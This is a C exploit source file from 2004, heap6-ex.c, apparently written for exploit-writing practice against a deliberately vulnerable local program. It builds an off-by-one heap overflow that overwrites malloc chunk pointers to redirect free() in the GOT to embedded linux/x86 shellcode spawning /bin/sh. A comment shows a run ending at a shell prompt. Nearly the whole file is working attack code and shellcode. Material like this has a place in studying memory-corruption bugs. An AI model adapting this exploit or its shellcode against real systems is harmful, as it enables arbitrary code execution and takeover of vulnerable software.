/*
 * $Id: heap6-ex.c,v 1.1 2004/06/02 12:15:03 raptor Exp $
 *
 * heap6-ex.c - heap6.c exploit (heap-based off-by-one)
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This exploit uses the heap-based off-by-one technique outlined in the
 * http://www.thc.org/root/docs/exploit_writing/heap_off_by_one.txt paper
 * by qitest1 <qitest1@bespin.org>.
 *
 * Structure of buf1: ["A"x12]
 * Structure of buf2: [free_addr - 12] [ret]
 *
 * raptor@karma:~/devel/heap$ uname -a
 * Linux karma 2.4.18-1-686-smp #1 SMP Mon Jan 5 20:42:23 UTC 2004 i686 unknown
 * raptor@karma:~/devel/heap$ gcc --version
 * 2.95.4
 * raptor@karma:~/devel/heap$ ./heap6-ex
 * Using ret address       : 0xbfffffcf
 * Using free() address    : 0x804991c
 *
 * len0: 12
 * len1: 8
 * p0 -> 0x8049948
 * p1 -> 0x8049958
 * allocated size for p0: 17 (0x11)
 * allocated size for p1: 17 (0x11)
 * allocated size for p0: 17 (0x11)
 * allocated size for p1: 0 ((nil))	<- the off-by-one sets the size to 0
 * sh-2.05a$
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define	VULN		"./heap6"	// the vulnerable program
#define BUF1SIZE	12 + 1		// size of buf1
#define BUF2SIZE	1024		// max size of buf2
#define FREE		0x0804991c	// free() address in .got

char sc[] = /* linux/x86 shellcode (12 + 24 = 36 bytes) */
"\xeb\x0aWHO_CARES?"
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf1[BUF1SIZE], buf2[BUF2SIZE];
	char	*p = buf2;

	char	*env[2] = {sc, NULL};
	int	free_addr = FREE;

	/* calculate the ret address in envp */
	int 	ret = 0xbffffffa - strlen(sc) - strlen(VULN);

	/* prepare buf1 */
	memset(buf1, 'A', sizeof(buf1));
	buf1[sizeof(buf1) - 1] = 0x0;

	/* prepare buf2 */
	bzero(buf2, sizeof(buf2));
	*((void **)p) = (void *)(free_addr - 12);	/* fd field */
	p += 4;
	*((void **)p) = (void *)(ret);			/* bk field */
	p += 4;

	/* print some output */
	fprintf(stderr, "Using ret address\t: %p\n", ret);
	fprintf(stderr, "Using free() address\t: %p\n\n", free_addr);

	/* run the vulnerable program */
	execle(VULN, VULN + 2, buf1, buf2, NULL, env);
	perror("execle");
}
